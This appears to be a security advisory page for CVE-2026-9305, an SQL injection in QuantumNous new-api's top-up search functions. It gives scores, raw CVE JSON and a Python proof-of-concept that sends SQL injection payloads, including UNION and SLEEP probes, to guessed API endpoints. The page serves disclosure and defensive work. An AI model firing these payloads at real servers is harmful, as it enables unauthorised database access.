Security Vulnerability Report
中文
CVE-2026-9305 CVSS 6.3 MEDIUM

CVE-2026-9305

Published: 2026-05-23 15:16:31
Last Modified: 2026-05-26 19:50:22

Description

A weakness has been identified in QuantumNous new-api up to 0.12.1. The impacted element is the function SearchUserTopUps/SearchAllTopUps of the file model/topup.go of the component self Endpoint. This manipulation causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

QuantumNous new-api <= 0.12.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-9305 SQL Injection PoC for QuantumNous new-api # Affected: QuantumNous new-api <= 0.12.1 # Target: SearchUserTopUps/SearchAllTopUps functions in model/topup.go import requests import sys TARGET_URL = "http://target-server/api/" def exploit_sql_injection(): """ SQL Injection PoC for CVE-2026-9305 Target: /api/topup/search endpoint (or similar) """ # Basic SQL Injection test payload # Using single quote to trigger SQL error payload = "'" # Target endpoint - adjust based on actual API structure endpoints = [ "topup/search", "topup/search_user", "topup/search_all", "api/topup/search", "api/topup/search_user", "api/topup/search_all" ] headers = { "Content-Type": "application/json", "Authorization": "Bearer <your_token_here>" # Low privilege token sufficient } for endpoint in endpoints: url = TARGET_URL + endpoint # Test for SQL injection with single quote data = { "user_id": payload, "search_term": payload } try: response = requests.post(url, json=data, headers=headers, timeout=10) # Check for SQL error indicators if any(indicator in response.text.lower() for indicator in [ "sql", "syntax", "mysql", "error", "exception", "database" ]): print(f"[+] Potential SQL Injection found at: {url}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Error testing {url}: {e}") # Blind SQL Injection test payload print("\n[*] Trying blind SQL injection payloads...") blind_payloads = [ "1' AND 1=1 --", "1' AND 1=2 --", "1' UNION SELECT NULL--", "1'; SELECT SLEEP(5)--" ] for payload in blind_payloads: data = {"user_id": payload, "search_term": payload} for endpoint in endpoints: try: response = requests.post( TARGET_URL + endpoint, json=data, headers=headers, timeout=10 ) print(f"[*] Tested payload: {payload[:30]}... on {endpoint}") except: pass return False if __name__ == "__main__": print("CVE-2026-9305 SQL Injection PoC") print("Target: QuantumNous new-api <= 0.12.1") print("=" * 50) if len(sys.argv) > 1: TARGET_URL = sys.argv[1] exploit_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9305", "sourceIdentifier": "[email protected]", "published": "2026-05-23T15:16:30.503", "lastModified": "2026-05-26T19:50:21.747", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in QuantumNous new-api up to 0.12.1. The impacted element is the function SearchUserTopUps/SearchAllTopUps of the file model/topup.go of the component self Endpoint. This manipulation causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gist.github.com/YLChen-007/cf501d0a66c81298b2f97e854f3813db", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/812192", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/812195", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365252", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365252/cti", "source": "[email protected]"}]}}